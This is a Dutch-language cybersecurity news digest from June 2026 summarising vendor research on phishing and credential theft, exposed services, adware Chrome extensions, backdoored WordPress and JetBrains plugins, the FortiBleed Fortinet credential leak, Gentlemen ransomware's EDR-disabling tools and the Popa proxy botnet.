Slechts 38% van de organisaties heeft er veel vertrouwen in dat zij diefstal van inloggegevens binnen 24 uur kunnen detecteren en erop kunnen reageren. Een meerderheid, 58%, heeft moeite met het identificeren welke inloggegevens of sessiecookies zijn blootgesteld na een phishingincident. Daarnaast worstelt 42% met het op grote schaal herstellen van blootgestelde gebruikers. Gemiddeld heeft 68% van de organisaties vier uur of langer nodig om bevestigde phishinggerelateerde blootstellingen te identificeren en te herstellen. Slechts 30% heeft de detectie van phishing volledig geïntegreerd met workflows voor identiteitsrespons.

Trevor Hilligoss, Chief Intelligence Officer bij SpyCloud, merkt op dat phishing zowel geavanceerder als schaalbaarder is geworden. Lokmiddelen gegenereerd met AI, PhaaS-platforms en adversary-in-the-middle (AiTM) technieken helpen aanvallers niet alleen gebruikersnamen en wachtwoorden te bemachtigen, maar ook sessiecookies en refresh tokens. Dit geeft hen geauthenticeerde toegang die lang kan aanhouden, zelfs na een wachtwoordreset. Preventie blijft belangrijk, maar organisaties hebben ook inzicht nodig in wat precies is blootgesteld en moeten in staat zijn om te herstellen voordat aanvallers deze blootstellingen kunnen misbruiken voor vervolgaanvallen zoals ransomware, overname van accounts, sessiekaping of fraude.

Het rapport combineert de enquêtebevindingen met SpyCloud's analyse van actieve phishingcampagnes en PhaaS-infrastructuur, wat een duidelijke en doelbewuste focus op bedrijfsdoelwitten onthult. SpyCloud-onderzoekers observeerden dat ongeveer de helft van de heroverde records afkomstig van PhaaS-platforms gekoppeld is aan bedrijfsidentiteiten, vergeleken met slechts 11% van de records afkomstig van malware. Dit duidt erop dat phishingaanvallen nu ongeveer vijf keer vaker gericht zijn op zakelijke gebruikers dan malware-infecties, een stijging ten opzichte van ongeveer drie keer vaker eind 2025. Deze trend wordt versterkt door SpyCloud's analyse van kits zoals Tycoon 2FA, waarbij ongeveer 80% van de buitgemaakte inloggegevens behoorde tot zakelijke e-mailaccounts.

Naast door AI gegenereerde phishing, die de grootste zorg is onder de respondenten, maken organisaties zich steeds meer zorgen over een breder scala aan phishinggerelateerde dreigingen. Business e-mail compromise (BEC) werd genoemd door 58% van de respondenten, imitatie van leveranciers door 52%, phishing via samenwerkingsplatforms door 36% en sessiekaping door 20%. Het rapport belicht ook groeiende zorgen over AiTM-phishingtechnieken, met name phishingaanvallen via apparaatcodes die legitieme OAuth-authenticatie workflows misbruiken om geauthenticeerde toegang te verkrijgen.

Hilligoss voegt toe dat aanvallers zich richten op technieken die hen de meest betrouwbare toegang met de minste inspanning bieden, en phishing via apparaatcodes voldoet aan beide criteria. In plaats van voortdurend authenticatiecontroles te bestrijden, kunnen zij legitieme workflows benutten om vertrouwde toegang te verkrijgen die vaak lang na de initiële compromittering blijft bestaan. Dit verandert het respons-proces aanzienlijk, omdat beveiligingsteams verder moeten kijken dan wachtwoordresets en zich moeten richten op het intrekken van tokens en sessies, een proces dat historisch gezien geen deel uitmaakte van het draaiboek na phishingincidenten. De rapportage benadrukt dat een gebrek aan inzicht de grootste uitdaging blijft voor organisaties na een succesvolle phishingaanval.

 

Bron: SpyCloud

18 juni 2026 | Top 10 meest voorkomende kwetsbaarheden in aanvalsvectoren

Een recent onderzoek door Intruder naar de aanvalsvectoren van 3.000 organisaties toont aan dat datalekken en inbraken vaak niet beginnen met een zero-day kwetsbaarheid. In plaats daarvan zijn blootgestelde beheerpanelen, hergebruikte inloggegevens of kwetsbaarheden zoals MongoBleed, die eerder dit jaar inloggegevens en sessietokens uit servergeheugen konden trekken zonder authenticatie, veelvoorkomende startpunten. Gezien de snelle time-to-exploit, vaak binnen één dag, is de cruciale vraag waarom deze diensten überhaupt extern toegankelijk zijn.

Het onderzoek, gedetailleerd in de '2026 Attack Surface Management Index', groepeerde de bevindingen in vier categorieën: HTTP-panelen, risicovolle poorten en diensten, databases, en publiek toegankelijke bestanden en informatie. De resultaten tonen de wijdverspreidheid van het probleem aan. Zestig procent van de onderzochte organisaties had minstens één HTTP-paneel extern blootgesteld, zoals beheerconsoles, beheerinterfaces of loginpagina's voor interne tools die niet publiekelijk bereikbaar zouden moeten zijn. Bijna de helft (49%) had een risicovolle poort of dienst blootgesteld, terwijl 42% een database had die rechtstreeks vanaf het internet bereikbaar was. Dertig procent had bestanden of informatie publiekelijk toegankelijk die dat niet zouden moeten zijn, zoals documentatie voor API's, configuratiebestanden of data die nooit bedoeld was om ontdekbaar te zijn.

De tien meest voorkomende aanvalsvectoren die organisaties in de afgelopen twaalf maanden troffen, zijn:

1.  MySQL-database blootgesteld - 26%

2.  Postgres-database blootgesteld - 16%

3.  Documentatie voor API blootgesteld - 15%

4.  WordPress-beheerpaneel blootgesteld - 15%

5.  Dienst voor extern bureaublad blootgesteld - 11%

6.  SNMP-dienst blootgesteld - 9%

7.  phpMyAdmin-beheerpaneel blootgesteld - 8%

8.  UPnP-dienst blootgesteld - 8%

9.  NTP-dienst blootgesteld - 7%

10. RPC Portmapper-dienst blootgesteld - 7%

Databases domineren de top twee van deze lijst, met meer dan een kwart van de organisaties die MySQL blootstellen en één op de zes die Postgres blootstelt. Internet-gerichte databases zijn al lange tijd een doelwit voor opportunistische aanvallers. De 'PLEASE_READ_ME' ransomware-campagne in 2020 bracht bijvoorbeeld meer dan 250.000 MySQL-databases in gevaar door zwakke inloggegevens te brute-forcen. MongoDB en Elasticsearch hebben met vergelijkbare aanvallen te maken gehad.

Opvallend is dat documentatie voor API's op de derde plaats staat, nog vóór de dienst voor extern bureaublad (RDP). Hoewel sommige API-documentatie opzettelijk publiek is, zien organisaties vaak documentatie over private of beheerders-API's over het hoofd die nooit ontdekbaar hadden moeten zijn. Publieke API-documentatie kan anders moeilijk te vinden kwetsbaarheden omzetten in gedocumenteerde aanvalspaden.

De dienst voor extern bureaublad (RDP) blijft op de vijfde plaats een punt van zorg, gezien de geschiedenis als initiële toegangsmethode bij ransomware aanvallen. De BlueKeep-kwetsbaarheid in 2019 maakte bijna een miljoen systemen direct kwetsbaar. Het raden van inloggegevens voor blootgestelde RDP-verbindingen blijft een van de meest betrouwbare methoden voor ransomware-operatoren om toegang te verkrijgen.

De overige diensten op de lijst - SNMP, UPnP, NTP en RPC - zijn legacy-diensten die ontworpen zijn voor interne netwerken en nooit bedoeld waren om via het internet toegankelijk te zijn. Het onderzoek benadrukt dat hoewel veel teams prioriteit geven aan patchen, de fundamentele vraag voor veel van deze blootstellingen is waarom ze überhaupt bereikbaar zijn. Dit onderstreept het belang van het verminderen van het aanvalsoppervlak, een aspect dat bij veel organisaties minder aandacht krijgt dan kwetsbaarheidsbeheer.

 

Bron: Intruder

18 juni 2026 | Chrome extensies misbruiken live wallpapers voor advertentiemonetisatie en tracking

Onderzoekers van Socket’s Threat Research Team hebben een netwerk van Chrome extensies voor live wallpapers blootgelegd dat wordt ingezet voor een grootschalig schema voor advertentiemonetisatie en verkeerstoewijzing. De extensies werden gepresenteerd als onschuldige aanpassingstools voor nieuwe tabbladen met populaire thema's zoals anime, voetbal, auto's en games. Achter de bekende Chrome Web Store-vermeldingen ontdekten de onderzoekers een gedeelde codebase die werd gebruikt door 152 extensies, gekoppeld aan 38 uitgeversaccounts en drie hoofdmerkdomeinen.

Tijdens de analyse van Socket waren 141 van deze extensies nog actief en beschikbaar in de Chrome Web Store; elf waren al verwijderd. Gezamenlijk had het netwerk ongeveer 105.000 gemelde installaties. Het onderzoek toont aan dat de extensies geen wachtwoorden stalen en geen advertenties injecteerden in pagina's die door gebruikers werden bezocht. Hun primaire doel was het leiden van gebruikers naar websites met advertentiemonetisatie, het bijhouden van installatie- en de-installatiegebeurtenissen, en het doen voorkomen dat door de extensie gegenereerd verkeer afkomstig was van echte organische zoekklikken van Google.

Veel van de extensies gebruikten namen en visuele elementen gebaseerd op bekende onderwerpen, waaronder Neymar, Satoru Gojo, Anime Car Drift, Gachiakuta, Hello Kitty, Minecraft, BMW en Naruto. De vermeldingen presenteerden deze als eenvoudige live wallpaper- of nieuwe tabbladextensies. Socket ontdekte dat de operatie was verdeeld over drie merk-backends: tabplugins.com, yowgames.com en chromewallpaper.com. Het chromewallpaper-domein leidde gebruikers om naar owhit.com, een ander domein dat gekoppeld is aan dezelfde monetarisatie-opzet.

Het meest actieve deel van de campagne was verbonden met tabplugins.com. Een subset van 54 extensies die de nieuwere tabplugins-sjabloon gebruikten, voegde valse toewijzing van organische zoekresultaten van Google toe aan installatieverkeer. Wanneer een gebruiker een van deze extensies installeerde, opende het achtergrondscript een tabblad naar de site van de operator met trackingparameters die beweerden dat het bezoek afkomstig was van organische zoekresultaten van Google. Organisch zoekverkeer is waardevol voor uitgevers, adverteerders en analysesystemen, waardoor een site met dergelijk verkeer betrouwbaarder lijkt. Socket constateerde echter dat dit verkeer door de extensie werd gecreëerd en niet door een persoon die Google doorzocht.

Het de-installatieproces maakte gebruik van een andere truc. De extensies stelden een de-installatie-URL in die de site van de operator omwikkelde in een google.com/urlredirect-formaat, inclusief trackingparameters in Google-stijl. Hierdoor leek een aan de de-installatie gerelateerd bezoek meer op een echte klik op een zoekresultaat van Google. Socket beschreef dit gedrag als misleidende verkeersmeting en adware-achtige activiteit, in plaats van een klassieke malware-infectie. De extensies functioneerden als wallpaper-tools, maar duwden gebruikers ook in een advertentietrechter en gaven een verkeerde voorstelling van hoe verkeer de sites van de operator bereikte.

De operatie bracht ook een privacykwestie met zich mee. Chrome Web Store-vermeldingen voor de extensies beweerden dat de ontwikkelaar geen gebruikersgegevens zou verzamelen of gebruiken. Het gekoppelde privacybeleid vertelde echter een ander verhaal. Volgens Socket gaf het beleid toe IP-adressen, browsertype, internetprovider, datum- en tijdstempels, verwijzingen, klikpercentages en andere gegevens te loggen, met delen van informatie met Google AdSense, DoubleClick, Google Analytics en externe advertentiepartners. De regels van de Chrome Web Store vereisen dat privacyverklaringen overeenkomen met het werkelijke gedrag van een extensie en het gepubliceerde privacybeleid. Socket merkte op dat dezelfde "geen gegevens verzameld"-verklaring verscheen op alle 141 actieve vermeldingen die het team analyseerde.

De extensies bevatten ook een IndexedDB-verwijderingsroutine in het achtergrondscript. Bij elke start van de servicewerker probeerde de code databases die zichtbaar waren voor de eigen oorsprong van de extensie te lijst en te verwijderen. Socket ontdekte dat de routine geen websitegegevens, cookies, sessies of browsegegevens verwijderde, omdat de opslag van Manifest V3-extensies per oorsprong is gescheiden. Toch beschouwden de onderzoekers het als een opvallende vingerafdruk van de familie, omdat dezelfde routine in elke geanalyseerde extensie verscheen. In de huidige build leek het in de praktijk inactief, omdat de extensies hun eigen instellingen in localStorage opsloegen en niet in IndexedDB.

Socket vond ook tekenen van gehaaste massaproductie. Drie op tabplugins gebaseerde extensies werden geleverd met een defect achtergrondscript vanwege een syntaxisfout in de installatie-URL. Deze extensies zijn nog steeds geïnstalleerd en wijzigden de nieuwe tabbladpagina, maar hun achtergrondtrackinglogica werkte niet. De monetarisatie-opzet was gebaseerd op het sturen van gebruikers naar door advertenties gefinancierde sites. Het tabplugins-domein laadde een programmatische advertentiestapel met Google Ad Manager, Prebid, AppNexus of Xandr, PixFuture, SmileWanted, Google Analytics 4 en andere advertentiegerelateerde diensten. Socket vond ook Google AdSense en Google Analytics-gebruik op de yowgames- en owhit-domeinen via gearchiveerde pagina's.

De onderzoekers schreven de operatie niet toe aan een bevestigd land of een persoon uit de echte wereld. Ze merkten wel enkele openbare contactgegevens en namen op die een Turkse connectie zouden kunnen suggereren, maar stelden dat deze aanwijzingen onvoldoende waren voor een stevige attributie.

Chrome-gebruikers wordt geadviseerd extensies voor live wallpapers of nieuwe tabbladen die verbonden zijn met tabplugins.com, yowgames.com, chromewallpaper.com of owhit.com te verwijderen. Na verwijdering moeten gebruikers controleren of de nieuwe tabbladpagina en de standaard zoekmachine van Chrome zijn ingesteld op hun voorkeuren. Gebruikers moeten ook voorzichtig zijn met nieuwe tabbladextensies, vooral wanneer deze zoekgerelateerde machtigingen aanvragen of gebruikers naar externe webpagina's leiden. Een wallpaper-extensie zou geen spelletjes moeten spelen met Google zoekattributie of installatie- en de-installatieverkeer naar door advertenties gefinancierde sites moeten sturen.

 

Bron: Socket

18 juni 2026 | WordPress plug-ins van ShapedPlugin voorzien van backdoor

Aanvallers zijn erin geslaagd om betaalde WordPress plug-ins van de leverancier ShapedPlugin te voorzien van een backdoor. Dit betreft specifiek de plug-ins Product Slider Pro for WooCommerce, Real Testimonials Pro en Smart Post Show Pro. Cybersecuritybedrijf Wordfence rapporteerde deze bevindingen in een recente analyse.

De aanval omvatte het compromitteren van de ontwikkel- en distributieomgeving van de softwareleverancier, waardoor de aanvallers een kwaadaardige backdoor konden toevoegen aan de plug-ins. ShapedPlugin biedt zowel gratis als betaalde versies van zijn plug-ins aan. De geïnfecteerde betaalde versies ontvangen updates rechtstreeks van de updateserver van de leverancier.

De geïmplementeerde malware verleent aanvallers niet alleen toegang tot de gecompromitteerde websites, maar is ook in staat om gevoelige gegevens te stelen. Deze gegevens omvatten gebruikersnamen en wachtwoorden, sessiecookies en TOTP seeds van diverse plug-ins voor tweefactorauthenticatie (2FA). Met deze gestolen wachtwoorden en TOTP seeds kunnen aanvallers de 2FA beveiliging omzeilen, wat een aanzienlijk risico vormt voor de beveiliging van gebruikersaccounts.

Hoewel de gratis versies van de ShapedPlugin plug-ins niet zijn voorzien van een backdoor, merkt Wordfence op dat de aanvallers wel de mogelijkheid hadden om deze eveneens te infecteren. ShapedPlugin heeft gereageerd op het incident en aangegeven te werken aan nieuwe, opgeschoonde versies. Voorafgaand aan de uitrol van deze nieuwe versies zal uitgebreid onderzoek worden verricht om de volledige veiligheid van de code te waarborgen. De methode waarmee de aanvallers toegang hebben verkregen tot de omgeving van de softwareontwikkelaar is op dit moment nog onbekend.

Wordfence benadrukt dat supply chain aanvallen een toenemend probleem vormen in alle soorten software, inclusief WordPress software. Het cybersecuritybedrijf uit tevens zijn zorgen over de evolutie van WordPress gerichte malware, die nu niet alleen wachtwoorden steelt, maar zich ook richt op het bemachtigen van 2FA secrets. Dit laatste wijst op een verhoogd niveau van sophistication van de aanvallers.

 

Bron: Wordfence

18 juni 2026 | Kwaadaardige JetBrains plugins stelen DeepSeek en OpenAI API sleutels

Cybercriminelen maken gebruik van nep-AI tools om softwareontwikkelaars te targeten in een gecoördineerde supply chain aanval op de JetBrains Marketplace. De compromittering werd aanvankelijk ontdekt door het beveiligingsbedrijf Aikido Security, dat vijftien gepubliceerde plugins vond die waren ontworpen als AI-codeerassistenten, gebouwd op grote taalmodellen (LLM's) zoals DeepSeek.

De eerste kwaadaardige plugins verschenen eind oktober 2025, en nieuwe varianten werden zo recent als juni 2026 uitgebracht. De oplichters gebruikten zeven verschillende verkopersaccounts om de plugins te publiceren. Gezamenlijk zijn deze kwaadaardige plugins bijna 70.000 keer gedownload. Enkele van de meest gedownloade plugins dragen namen zoals CodeGPT AI Assistant en DeepSeek AI Assist. Om de tools een betrouwbare uitstraling te geven, voegden de aanvallers ook nep-vijfsterrenrecensies toe.

De werkwijze van deze campagne, vergelijkbaar met eerdere aanvallen, omvat de installatie van extensies en het exfiltreren van de privé AI-authenticatiegegevens van de gebruiker naar een statische, hardgecodeerde server die onder controle staat van de aanvallers. De kwaadaardige code was gestructureerd binnen anderszins volledig functionele software die legitieme functies bood, zoals codereviews, geautomatiseerde git commitberichten en unittests. De infiltratie is zo ontworpen dat het een routinematig installatieproces lijkt, waarbij ontwikkelaars een OpenAI, SiliconFlow of DeepSeek API-sleutel in de instellingeninterface plakken.

Volgens de onderzoekers van Aikido Security haakt de software in op de opslagfunctie van de Integrated Development Environments (IDE's), de belangrijkste softwaretoepassingen waarin ontwikkelaars code schrijven. Op het exacte moment dat een gebruiker zijn wijzigingen toepast, verzendt de extensie de authenticatiegegevens in platte tekst via een onversleutelde HTTP-verbinding. Deze gegevens worden vervolgens naar de command-and-control (C2) server van de aanvallers gestuurd. Deze verzending vindt stilzwijgend op de achtergrond plaats, zonder toestemmingsprompts of visuele indicatoren.

De onderzoekers legden ook uit dat de dreigingsactoren een gemonetariseerde secundaire laag hebben geïntegreerd. Gebruikers die ervoor kozen een kleine vergoeding te betalen via een in-app donatieprompt, ontvingen een functionele, onbeperkte AI-sleutel terug van de kwaadaardige server. Aikido merkte op dat de sleutels die aan betalende gebruikers werden verstrekt, mogelijk de sleutels zijn die van alle andere gebruikers zijn gestolen, waardoor de campagne verandert in een dienst die de gestolen API-toegang van anderen doorverkoopt. Dit architecturale model stelt de beheerders in staat om enerzijds gratis API-sleutels van ontwikkelaars te stelen, terwijl zij anderzijds directe inkomsten genereren, waarbij de oorspronkelijke eigenaars van de referenties onbewust het ongeautoriseerde computergebruik financieren.

Dit onderzoek benadrukt een belangrijk feit: hackers richten zich tegenwoordig graag op IDE's. IDE-plugins beschikken over hoge privileges en missen sandboxbeperkingen op ontwikkelaarswerkstations, waardoor ze een waardevol toegangspunt vormen voor het stelen van broncode, cloudreferenties en API-toegang. Soortgelijke technieken werden eind 2025 waargenomen tijdens de GlassWorm malwarecampagne, die het Visual Studio Code systeem succesvol compromitteerde. Gezien het feit dat IDE-plugins direct draaien op gevoelige engineering-werkstations, adviseren onderzoekers ontwikkelaars om marktplaatsextensies met dezelfde voorzichtigheid te behandelen als elke andere afhankelijkheid van derden.

 

Bron: Aikido Security

19 juni 2026 | CISA waarschuwt Fortinet-gebruikers na 'FortiBleed' datalek met 74.000 inloggegevens

Het Amerikaanse Cybersecurity and Infrastructure Security Agency (CISA) heeft Fortinet-klanten dringend geadviseerd hun apparaten te beveiligen na een datalek, bekend als "FortiBleed", waarbij bijna 74.000 inloggegevens voor firewalls en VPN's zijn blootgesteld. Deze waarschuwing volgt op berichten dat kwaadwillende cyberactoren misbruik maken van gecompromitteerde inloggegevens om internet-toegankelijke apparaten van Fortinet aan te vallen bij overheids- en private sectororganisaties wereldwijd.

Volgens CISA betreft de activiteit, aangeduid als FortiBleed, de blootstelling van gelekte inloggegevens die zijn gekoppeld aan ongeveer 74.000 Fortinet-apparaten, waaronder firewalls en VPN-gateways. CISA heeft getroffen eigenaren van FortiGate-apparaten opgeroepen om alle SSL VPN- en beheersessies te beëindigen, alle VPN- en beheerwachtwoorden opnieuw in te stellen, phishing-resistente meervoudige authenticatie in te schakelen en logs te controleren op tekenen van ongeautoriseerde toegang of laterale beweging.

Verder adviseerde CISA Fortinet-klanten om beheerdersinloggegevens op te slaan met behulp van het moderne Password-Based Key Derivation Function 2 (PBKDF2) hashingalgoritme. Ook wordt aangeraden om beheerinterfaces van firewalls te beperken van toegang via het openbare internet en om ongeautoriseerde accounts te verwijderen, om zo het aanvalsoppervlak zoveel mogelijk te verkleinen.

Het FortiBleed datalek werd ontdekt door beveiligingsonderzoeker Volodymyr "Bob" Diachenko. Hij vond een server met wat geldige Fortinet VPN-inloggegevens leken te zijn, inclusief gebruikersnamen, e-mailadressen en wachtwoorden in platte tekst, voor 73.932 firewall-URL's wereldwijd. De blootgestelde gegevens bevatten ook informatie over de branche, omzet en het aantal werknemers van elke organisatie, wat volgens Diachenko lijkt te zijn verzameld om toekomstige aanvallen te plannen.

Dreigingsinformatiebedrijf Hudson Rock, dat de dataset ook analyseerde, beschreef het als een van de grootste bekende verzamelingen van gecompromitteerde Fortinet-inloggegevens. De gegevens omvatten 21.632 unieke domeinen en 194 landen. Onder de organisaties die in de dataset vertegenwoordigd zijn, bevinden zich Samsung, Mercedes-Benz, Foxconn, Chevron, Comcast, AT&T en Toyota, samen met vele overheidsinstanties en exploitanten van kritieke infrastructuur in sectoren zoals telecommunicatie, gezondheidszorg, financiële diensten en productie. De meeste getroffen apparaten kwamen uit India, de Verenigde Staten, Taiwan, Mexico, Turkije, Thailand, Colombia, Maleisië, Chili en de Verenigde Arabische Emiraten.

Diachenko meldde ook dat de operatie werd uitgevoerd door een Russisch sprekende dreigingsgroep. Deze groep zou ongeveer 1,16 miljard inlogpogingen hebben uitgevoerd tegen meer dan 320.000 FortiGate-doelwitten om SSL VPN-authenticatiehashes te onderscheppen. De bron van de configuratiegegevens blijft echter onbekend. Cybersecurity-expert Kevin Beaumont heeft onafhankelijk de authenticiteit van sommige inloggegevens bevestigd en merkte op dat de meeste getroffen apparaten nog steeds online zijn. Hij voegde eraan toe dat de gelekte gegevens afkomstig lijken te zijn van Fortinet-configuratiebestanden, hoewel de exacte methode van diefstal onduidelijk blijft.

Hudson Rock heeft een gratis FortiBleed-opzoektool ontwikkeld om organisaties te helpen controleren of zij getroffen zijn. Eerder deze week rapporteerde dreigingsinformatiebedrijf Defused ook dat verschillende kritieke kwetsbaarheden in Fortinet's FortiSandbox cyberdreigingsdetectieplatform nu actief worden misbruikt in aanvallen. CISA houdt in totaal 26 kwetsbaarheden in Fortinet-beveiliging bij die in het wild zijn misbruikt in de afgelopen jaren, waarvan 13 werden gebruikt in ransomware aanvallen.

 

Bron: CISA | Bron 2: infostealers.com | Bron 3: doublepulsar.com

19 juni 2026 | Gentlemen ransomware zet geavanceerde EDR-uitschakeltools in voor omzeiling beveiliging

De ransomware-as-a-service (RaaS) groep Gentlemen ontwikkelt en onderhoudt actief een reeks tools om endpoint detection and response (EDR) systemen uit te schakelen. Deze tools helpen aangesloten criminelen detectie tijdens aanvallen te omzeilen. De groep maakt gebruik van een verzameling EDR-uitschakeltools, waarvan de meest opvallende een hulpprogramma is dat onderzoekers GentleKiller hebben genoemd.

GentleKiller heeft minstens acht varianten en doet zich voor als legitieme beveiligingsproducten, waaronder Kaspersky, Valorant, Javelin en WatchDog. EDR-uitschakeltools worden doorgaans gebruikt in de vroege fasen van een aanval om verdedigingsmechanismen uit te schakelen, en bij ransomware-incidenten zorgen ze ervoor dat processen voor gegevensdiefstal of encryptie ongehinderd kunnen plaatsvinden. Deze tools werken door misbruik te maken van de 'bring your own vulnerable driver' (BYOVD) techniek om privileges te verhogen en beveiligingsengines uit te schakelen.

Volgens onderzoekers van ESET gebruikt elke GentleKiller-variant verschillende kwetsbare drivers om kernel-level privileges te verkrijgen. Ze delen echter gemeenschappelijke strings, identieke code-obfuscatie technieken en vergelijkbare logica en reikwijdte voor het beëindigen van processen. De analyse van de varianten wijst erop dat het framework is ontworpen om eenvoudig drivers te kunnen wisselen of nieuw ontdekte kwetsbaarheden te bewapenen zonder ingrijpende codewijzigingen.

ESET stelt dat GentleKiller zich richt op meer dan 400 processen die geassocieerd zijn met ongeveer 48 beveiligingsleveranciers en -producten, waaronder Microsoft, CrowdStrike, SentinelOne, Palo Alto, Sophos, Trend Micro, ESET, Bitdefender, McAfee/Trellix en Kaspersky. De binaries van de EDR-uitschakeltool worden beschermd door de commerciële Enigma en Themida packing en codebeveiligingstools. ESET merkt ook op dat de dreigingsactor gestolen digitale handtekeningen van legitieme software gebruikt, hoewel deze ongeldig zijn.

Hoewel GentleKiller een gestandaardiseerde tool is die wordt ingezet bij aanvallen van Gentlemen ransomware, rapporteert ESET dat de verzameling EDR-uitschakeltools van de dreigingsgroep ook minstens drie externe tools omvat: HexKiller (eerder gebruikt door de groep Warlock), ThrottleBlood (gekoppeld aan MesudaLocker- en DragonForce-aanvallen) en HavocKiller (ook waargenomen bij ransomware-operaties). De Gentlemen RaaS heeft deze mogelijk toegevoegd voor redundantie, om attributie te bemoeilijken, of voor gebruik in specifieke gevallen waar de effectiviteit van GentleKiller beperkt zou kunnen zijn.

Bovendien heeft ESET het gebruik van OxideHarvest gedocumenteerd, een op Rust gebaseerde credential-stealer tool. De onderzoekers vermoeden, gezien de keuze van de programmeertaal, dat deze extern is ontwikkeld. De analyse van de onderzoekers wijst erop dat Gentlemen ransomware doelwitten kiest op basis van de configuratie van hun FortiGate-endpoints. Dit is met name interessant gezien de recente ontdekking van "FortiBleed", een verzameling van bijna 74.000 FortiGate VPN-inloggegevens. De Gentlemen RaaS heeft eerder de Roemeense energieleverancier Oltenia gecompromitteerd en is in verband gebracht met een SystemBC proxy malware botnet met meer dan 1.570 hosts, vermoedelijk bedrijfsslachtoffers.

 

Bron: ESET | Bron 2: welivesecurity.com | Bron 3: hubs.li

19 juni 2026 | Popa botnet gelinkt aan Israëlische proxy-aanbieder NetNut

Een grootschalig botnet op Android-basis, bekend als Popa, heeft de afgelopen vier jaar miljoenen consumenten-tv-boxen gedwongen om internetverkeer door te sturen. Dit verkeer werd gebruikt voor advertentiefraude, accountovernames en grootschalige data scraping-activiteiten. Beveiligingsonderzoekers van diverse bedrijven hebben deze week geconcludeerd dat het Popa botnet is gekoppeld aan NetNut, een aanbieder van residentiële proxies die wordt beheerd door het beursgenoteerde Israëlische bedrijf Alarum Technologies Ltd (NASDAQ: ALAR).

De kern van het probleem ligt bij malafide streaming-apparaten die online worden verkocht. Deze apparaten schrijven het internetadres van de gebruiker in voor een residentiële proxydienst. Hoewel Popa een omvangrijk botnet is, onderscheidt het zich van traditionele botnets die gericht zijn op destructieve activiteiten zoals DDoS aanvallen. Popa lijkt ontworpen met het specifieke doel om een persistente communicatielaag te implementeren, in staat om apparaten te registreren, langdurige versleutelde verbindingen te onderhouden en communicatietunnels op aanvraag te openen.

Experts stellen dat Popa een plugin-component is die geassocieerd wordt met het Vo1d botnet, een grootschalige malwarecampagne die zich richt op onofficiële tv-boxen op Android-basis. Deze apparaten, die onder duizenden merknamen en modelnummers op grote e-commerce platforms verkrijgbaar zijn, adverteren de mogelijkheid om honderden abonnementsvideodiensten te streamen tegen een eenmalige vergoeding. Echter, zoals de FBI en experts uit de beveiligingsindustrie herhaaldelijk hebben gewaarschuwd, worden deze streaming-boxen vaak geleverd met vooraf geïnstalleerde software die de tv van de gebruiker verandert in een residentiële proxy. Dit stelt derden in staat om hun internetverkeer via het apparaat te routeren zolang het is aangesloten en verbonden met een lokaal netwerk. Een bijkomende zorg is dat sommige van deze proxynetwerken weinig doen om te voorkomen dat kwaadwillende klanten communiceren met, en zelfs systemen compromitteren op, het lokale netwerk van de nietsvermoedende eigenaar van het apparaat.

De eerste aanwijzingen over de oorsprong van Popa verschenen in een rapport uit 2025 van het Chinese beveiligingsbedrijf XLAB. Dit rapport wees op minstens negen domeinnamen die werden gebruikt om de activiteiten van gecompromitteerde apparaten te registreren en te sturen. In een vandaag gepubliceerd rapport beschreef het beveiligingsbedrijf Qurium hoe het op enkele van dezelfde domeinen stuitte tijdens een onderzoek naar een reeks disruptieve en kostbare data scraping-incidenten in mei 2026. Deze scraping-activiteit was gelijkmatig verspreid over meer dan 1,4 miljoen internetadressen. Qurium identificeerde tientallen domeinen die werden gebruikt om Popa te controleren en die in de loop van de tijd gelijktijdig op meerdere internetadressen werden gehost, waaronder gmslb[.]net, safernetwork[.]io, tera-home[.]com en ninjatech[.]io.

Na dieper onderzoek ontdekte Qurium dat gmslb[.]net werd genoemd in tientallen gepirateerde of gemodificeerde apps voor het streamen van video-content, zoals CRICFy, DooFlix, Sprozfy, RTS Tv, Flixoid, CyberFlix, Rapid Streamz, TvMob en HD/OceanStreams. Het rapport van Qurium merkt op dat de meeste domeinen die lange tijd werden gebruikt om het Popa botnet te controleren, in juli 2025 in beslag werden genomen of ontmanteld. Dit gebeurde nadat Google, HUMAN Security en Trend Micro samenwerkten om Badbox 2.0 te verstoren, een botnet dat nauw verbonden is met Vo1d. Qurium stelde dat onmiddellijk na die verstoring tientallen nieuwe domeinen werden geregistreerd om als controllers voor het Popa botnet te dienen, maar dat één van die controledomeinen niet nieuw was, namelijk ninjatech[.]io.

Ninjatech is een bedrijf dat werd opgericht door Moishi Kramer, wiens LinkedIn-profiel aangeeft dat hij vicepresident onderzoek en ontwikkeling is bij NetNut. Zijn cv vermeldt dat Kramer heeft geholpen NetNut "vanaf de grond af op te bouwen", de "architectuur te ontwerpen" en "NetNut op te schalen" voordat het bedrijf werd overgenomen door Alarum Technologies. Een zelfgemaakte vermelding op de vacaturesite F6S verwijst naar Kramer als de enige eigenaar van het Ninjatech-domein.

In een reactie via e-mail verklaarde Kramer dat Ninjatech ongeveer vijf jaar geleden de activiteiten staakte, toen het bedrijf een software development kit (SDK) genaamd Popa verkocht. Deze SDK was ontworpen om een klein deel van de bandbreedte van een apparaat te gebruiken en alleen te draaien nadat de hostapplicatie toestemming van de gebruiker had verkregen. Kramer benadrukte dat de code jaren geleden is verkocht en gelicentieerd aan derden, inclusief wederverkopers. Hij stelde dat zodra software op die manier wordt gedistribueerd, de oorspronkelijke ontwikkelaar geen controle meer heeft over hoe anderen deze later wijzigen, rebranden of implementeren. Kramer ontkent dat hij of NetNut de infrastructuur die als Popa wordt beschreven bouwt, exploiteert of onderhoudt, en dat hij geen controle heeft over het Ninjatech-domein. Hij voegde eraan toe dat hij de in juni 2025 genoemde domeinen niet heeft geregistreerd en niet weet wie dat wel heeft gedaan, en dat hij geen controle of inzicht heeft in die infrastructuur.

Echter, in een afzonderlijk Popa onderzoeksrapport dat vandaag is uitgebracht, stelt het bedrijf dat proxies volgt, Synthient, dat een recente analyse van de Popa SDK uitgaand verkeer onthulde dat duidelijk geassocieerd is met NetNut. Synthient schreef dat het onderzoeksteam met grote zekerheid kan stellen dat apparaten die Popa draaien verkeer van klanten van NetNut doorsturen.

